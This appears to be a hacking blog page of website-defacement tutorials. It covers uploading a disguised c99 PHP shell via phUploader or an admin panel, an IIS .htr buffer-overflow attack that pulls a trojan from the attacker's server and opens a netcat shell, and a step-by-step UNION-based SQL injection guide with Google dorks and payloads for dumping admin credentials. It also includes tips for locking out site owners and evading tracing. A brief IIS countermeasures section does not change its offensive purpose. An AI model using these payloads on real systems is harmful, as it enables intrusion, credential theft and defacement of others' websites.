WHAT'S NEW?
Loading...

Hack Website By Uploding shell – Tutorial


Google Dork : intitle:Powered By phUploader 

Go to Google.com and enter this DOrk, see serach results 
Exploit URL : 
http://{site.comt}/ path/upload.php
or 
http://site.com/upload.php

select any website and upload your file there 
website allow to upload .jpg .png .gif anf .png files only
anyway you can upload your deface in .jpg and mirrOr website like 
zone-h accept it as defcaement, if want to upload a shell then upload as 
shell.php.jpg

after uploading your file you'll got a message 
Your file(s) have been uploaded!


see the Example Link Below this message For view Your uploaded File

Live Demo ~ http://Victimsite.com/phUploader.php

Uploaded File ~ http://www.Victimsite.com/uploads/1321616908.jpg

Download Shell

How To Upload Shell and Deface Website – Tutorial

What we need:

1-A Shell (Will be provided)


2-A website vulnerable to SQLi


3-Image or File upload area on that Vulnerable website

So firstly download the shell here.

Download

What is Shell ?

A shell script is a script written for the shell, or command line interpreter, of an operating system. It is often considered a simple domain-specific programming language. Typical operations performed by shell scripts include file manipulation, program execution, and printing text.
This is a plain c99 shell, BUT it is Undetected so you should not get a warning from a anti virus if you download it. (update: not Undetected anymore )

I am not going to explain SQLi just how to deface.

Sql Tut- http://sumitcrackzone.blogspot.in/2012/08/how-to-hack-website-with-sql-injection.html

So now go get yourself a vulnerable site, hack it and get the Admin Login details and get the Admin Page address.

Now login to the admin page with the admin details you got.

Go through the admin page until you find a place where you can upload a picture (Usually a picture).

Now you have to upload the shell. Right if you don’t get an error it is all good.

Now to find the shell

Go through the site until you find any image and if you are using firefox Right

- Click on it and “Copy Image Location”

Make a new tab and paste it there.

It will probably look something like this:

http://www.example.com/images/photonamehere.jpg

So now that we know that change “/photonamehere.jpg” to “/c99ud.php.jpg” (Without Qoutes)

Now a page will come up looking like this:


Does probably not look like that but will look similar.

Now you have access to all the files on the site
What you want to do is now,
Find index.php or whatever the main page is, and replace it with your HTML code for your Deface Page.

Then you can either delete all the other files OR (and I recommend this) Let it redirect to the main page.

Keep in mind:

• Change Admin Username and Password

•The people have FTP access so you need to change that Password too .

•Always use a Proxy or VPN

How To Hack Web Servers - tutorial


Hacking Tool: IISHack.exe

iishack.exe overflows a buffer used by IIS http daemon,
allowing for arbitrary code to be executed.
c:\ iishack www.yourtarget.com 80 www.yourserver.com/thetrojan.exe
www.yourtarget.com is the IIS server you're hacking, 80 is the port its listening on,
 www.yourserver.com is some webserver with your trojan or custom script (your own, or another), and /thetrojan.exe is the path to that script.

"IIS Hack" is a buffer overflow vulnerability exposed by the way IIS handles requests with .HTR extensions.
A hacker sends a long URL that ends with ".HTR". IIS interprets it as a file type of HTR and invokes the ISM.DLL to handle the request.

Since ISM.DLL is vulnerable to a buffer overflow, a carefully crafted string can be executed in the security context of IIS,

which is privileged. For example, it is relatively simple to include in the exploit code a sequence of commands that will open a TCP/IP connection,
download an executable and then execute it.
This way,

any malicious code can be executed.
A sample exploit can be constructed as shown below:
To hack the target site and attacker's system running a web server can use iishack.exe and ncx.exe.
To begin with, the ncx.exe is configured to run from the root directory.
IIShack.exe is then run against the victim site.
c:\>iishack.exe  80 /ncx.exe
The attacker can then use netcat to evoke the command shell
c:\>nc  80
He can proceed to upload and execute any code of his choice and maintain a backdoor on the target site.


IPP Buffer Overflow Countermeasures

Install latest service pack from Microsoft.
Remove IPP printing from IIS Server
Install firewall and remove unused extensions
Implement aggressive network egress filtering
Use IISLockdown and URLScan utilities
Regularly scan your network for vulnerable servers
Without any further explanation,
the first countermeasure is obviously to install the latest service packs and hotfixes.
As with many IIS vulnerabilities, the IPP exploit takes advantage of a bug in an ISAPI DLL that ships with IIS 5 and is configured by default to handle requests for certain file types.
This particular ISAPI filter resides in C: \WINNT\System32\msw3prt.dll and provides Windows 2000 with support for the IPP. If this functionality is not required on the Web server,
the application mapping for this DLL to .printer files can be removed (and optionally deleting the DLL itself) in order to prevent the buffer overflow from being exploited.
This is possible because the DLL will not be loaded into the IIS process when it starts up.
In fact, most security issues are centered on the ISAPI DLL mappings,
making this one of the most important countermeasure to be adopted when securing IIS.
Another standard countermeasure that can be adopted here is to use a firewall and remove any extensions that are not required.
Implementing aggressive network egress can help to a certain degree.
With IIS, using IISLockdown and URLScan - (free utilities from Microsoft) can ensure more protection and minimize damage in case the web server is affected.
Microsoft has also released a patch for the buffer overflow,
 but removing the ISAPI DLL is a more proactive solution in case there are additional vulnerabilities that are yet to be found with the code.


ISAPI DLL Source disclosures

Microsoft IIS 4.0 and 5.0 can be made to disclose fragments of source code which should otherwise be in accessible.
This is done by appending "+.htr" to a request for a known .asp (or .asa, .ini, etc) file.
appending this string causes the request to be handled by ISM.DLL, which then strips the '+.htr' string and may disclose part or all of the source of the .asp file specified in the request.
IIS supports several file types that require server-side processing. When a web site visitor requests a file of one of these types, an appropriate filter DLL processes it. Vulnerability exists in ISM.DLL,
the filter DLL that processes .HTR files. HTR files enable remote administration of user passwords.
HTR files are scripts that allow Windows NT password services to be provided via IIS web servers. Windows NT users can use .HTR scripts to change their own passwords, and administrators can use them to perform a wide array of password administration functions.
HTR is a first-generation advanced scripting technology that is included in IIS 3.0, and still supported by later versions of IIS for backwards compatibility. However, HTR was never widely adopted, and was superceded by Active Server Pages (ASP) technology introduced in IIS 4.0.

Attack Methods


Exploit / Attack Methodology
By making a specially formed request to IIS, with the name of the file and then appending around 230 + " %20 " (these represents spaces) and then appending " .htr " this tricks IIS into thinking that the client is requesting a " .htr " file . The .htr file extension is mapped to the ISM.DLL ISAPI Application and IIS redirects all requests for .htr resources to this DLL.

ISM.DLL is then passed the name of the file to open and execute but before doing this ISM.DLL truncates the buffer sent to it chopping off the .htr and a few spaces and ends up opening the file whose source is sought. The contents are then returned. This attack can only be launched once though, unless the web service started and stopped. It will only work when ISM.DLL first loaded into memory.

"Undelimited .HTR Request" vulnerability: The first vulnerability is a denial of service vulnerability. All .HTR files accept certain parameters that are expected to be delimited in a particular way. This vulnerability exists because the search routine for the delimiter isn't properly bounded. Thus, if a malicious user provided a request without the expected delimiter, the ISAPI filter that processes it would search forever for the delimiter and never find it.

If a malicious user submitted a password change request that lacked an expected delimiter, ISM.DLL, the ISAPI extension that processes .HTR files, would search endlessly for it. This would prevent the server from servicing any more password change requests. In addition, the search would consume CPU time, so the overall response of the server might be slowed.
The second threat would be more difficult to exploit. A carefully-constructed file request could cause arbitrary code to execute on the server via a classic buffer overrun technique. Neither scenario could occur accidentally. This vulnerability does not involve the functionality of the password administration features of .HTR files.

".HTR File Fragment Reading" vulnerability: The ".HTR File Fragment Reading" vulnerability could allow fragments of certain types of files to be read by providing a malformed request that would cause the. HTR processing to be applied to them. This vulnerability could allow a malicious user to read certain types of files under some very restrictive circumstances by levying a bogus .HTR request. The ISAPI filter will attempt to interpret the requested file as an .HTR file, and this would have the effect of removing virtually everything but text from a selected file. That is, it would have the effect of stripping out the very information that is most likely to contain sensitive information in .asp and other server-side files.

The .htr vulnerability will allow data to be added, deleted or changed on the server, or allow any administrative control on the server to be usurped. Although .HTR files are used to allow web-based password administration, this vulnerability does not involve any weakness in password handling.
"Absent Directory Browser Argument" vulnerability: Among the default HTR scripts provided in IIS 3.0 (and preserved on upgrade to IIS 4.0 and IIS 5.0) were several that allowed web site administrators to view directories on the server. One of these scripts, if called without an expected argument, will enter an infinite loop that can consume all of the system's CPU availability, thereby preventing the server from responding to requests for service.

How To Hack website With SQL Injection : Full Tutorial


I'm posting this here coz this tut explains everything step by step. but most of the sql tuts ends when we find the password hash. So newbees dnt know wat to do after that. In this tut i'm gonna explain how to deface a website from scratch hope you fill find this usefull....

If you find this tut usefull please post a comment....

1) FINDING THE TARGET AND GETTING THE ADMIN PASSWORD


First we must find our target website to do that you can use this "dorks".
I'll give some dorks here copy anyone of it and paste it in google and search.
Code:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=

you can find lots of dorks here..(use them without the " " marks)
Code:
Click Here To Download

1). Check for vulnerability

Let's say that we have some site like this

http://www.site.com/news.php?id=5

Now to test if is vulrnable we add to the end of url ' (quote),

and that would be http://www.site.com/news.php?id=5'

so if we get some error like
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."
or something similar

that means is vulrnable to sql injection

2). Find the number of columns

To find number of columns we use statement ORDER BY (tells database how to order the result)

so how to use it? Well just incrementing the number until we get an error.

http://www.site.com/news.php?id=5 order by 1/* <-- no error
http://www.site.com/news.php?id=5 order by 2/* <-- no error
http://www.site.com/news.php?id=5 order by 3/* <-- no error
http://www.site.com/news.php?id=5 order by 4/* <-- error (we get message like this Unknown column '4' in 'order clause' or something like that)

that means that the it has 3 columns, cause we got an error on 4.

3). Check for UNION function


With union we can select more data in one sql statement.
so we have
http://www.site.com/news.php?id=5 union all select 1,2,3/* (we already found that number of columns are 3 in section 2). )

if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works

4). Check for MySQL version


http://www.site.com/news.php?id=5 union all select 1,2,3/* NOTE: if /* not working or you get some error, then try --
it's a comment and it's important for our query to work properly.

let say that we have number 2 on the screen, now to check for version we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.

it should look like this
http://www.site.com/news.php?id=5 union all select 1,@@version,3/*

if you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."

i didn't see any paper covering this problem, so i must write it

what we need is convert() function

i.e.

 http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*

or with hex() and unhex()

 i.e.

http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*

and you will get MySQL version

5). Getting table and column name
well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12...) <--- later i will describe for MySQL > 5 version.
we must guess table and column name in most cases.

common table names are: user/s, admin/s, member/s ...

common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...

i.e would be

http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that's good )

we know that table admin exists...


now to check column names.


http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* (if you get an error, then try the other column name)

we get username displayed on screen, example would be admin, or superadmin etc...

now to check if column password exists

http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try the other column name)

we seen password on the screen in hash or plain-text, it depends of how the database is set up

i.e md5 hash, mysql hash, sha1...

now we must complete query to look nice

for that we can use concat() function (it joins strings)

i.e

http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*

Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon)

(there is another way for that, char(58), ascii value for : )


http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*

now we get dislayed username:password on screen, i.e admin:admin or admin:somehash

when you have this, you can login like admin or some superuser

if can't guess the right table name, you can always try mysql.user (default)

it has user i password columns, so example would be

http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*

6). MySQL 5

Like i said before i'm gonna explain how to get table and column names
in MySQL > 5.

For this we need information_schema. It holds all tables and columns in database.

to get tables we use table_name and information_schema.tables.

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*

here we replace the our number 2 with table_name to get the first table from information_schema.tables

displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*

note that i put 0,1 (get 1 result starting from the 0th)

now to view the second table, we change limit 0,1 to limit 1,1

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*

the second table is displayed.

for third table we put limit 2,1

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc...

To get the column names the method is the same.

here we use column_name and information_schema.columns

the method is same as above so example would be


http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*

the first column is diplayed.

the second one (we change limit 0,1 to limit 1,1)

ie.


http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*

the second column is displayed, so keep incrementing until you get something like

username,user,login, password, pass, passwd etc...

if you wanna display column names for specific table use this query. (where clause)

let's say that we found table users.

i.e

http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*

now we get displayed column name in table users. Just using LIMIT we can list all columns in table users.

Note that this won't work if the magic quotes is ON.

let's say that we found colums user, pass and email.

now to complete query to put them all together

for that we use concat() , i decribe it earlier.

i.e


http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*

what we get here is user:pass:email from table users.

example: admin:hash:whatever@blabla.com

** if you are too lazy for doing above stuff you can use tools they will do all the job:
1) Exploit scanner (this will find vulnerable websites)
Code:

Click Here To Download

2) SQLi helpper (this tool will do all the injecting job and get you the pass or hash)
Code:

Click Here To Download

*** use the tools only if you are new to hacking. Do it manually thats the thrill and that is real hacking. When you do it manually you will understand the concept.

in some websites you can directly see the password. but most of the websites encrypt them using MD5. so u hav to crack the hash to get the password. to crack the password there are three ways
1) check the net whether this hash is cracked before:
Code:

Click Here To Download

2) crack the password with the help of a site:
Code:

Click Here To Download 
Click Here To Download 

3) use a MD5 cracking software:
Code:

Click Here To Download 
Password = OwlsNest

2) DEFACING THE WEBSITE

after getting the password you can login as the admin of the site. But first you have to find the admin login page for the site. there r three methods to find the admin panel.
1) you can use an admin finder website:
Code:

Click Here To Download 

2) you can use an admin finder software:
Code:

Click Here To Download 

after logging in as the admin you can upload photos to the site. so now you are going to upload a shell into the site using this upload facility.

dowload the shell here(shells are php scripts which affects websites so it will be detected as trojans but no need to worry i take the responsibility):

Code:
Click Here To Download 
extract it you will get a c99.php upload it.
some sites wont allow you to upload a php file. so rename it as c99.php.gif
then upload it.

after that go to http://www.site.com/images (in most sites images are saved in this dir but if you cant find c99 there then you have to guess the dir)
find the c99.php;.gif and click it..
now you can see a big control pannel....
now you can do what ever you want to do...
search for the index.html file and replace it with your own file. so if any one goes to that site they will see your page....

after doing this click logout.... thats it you are done..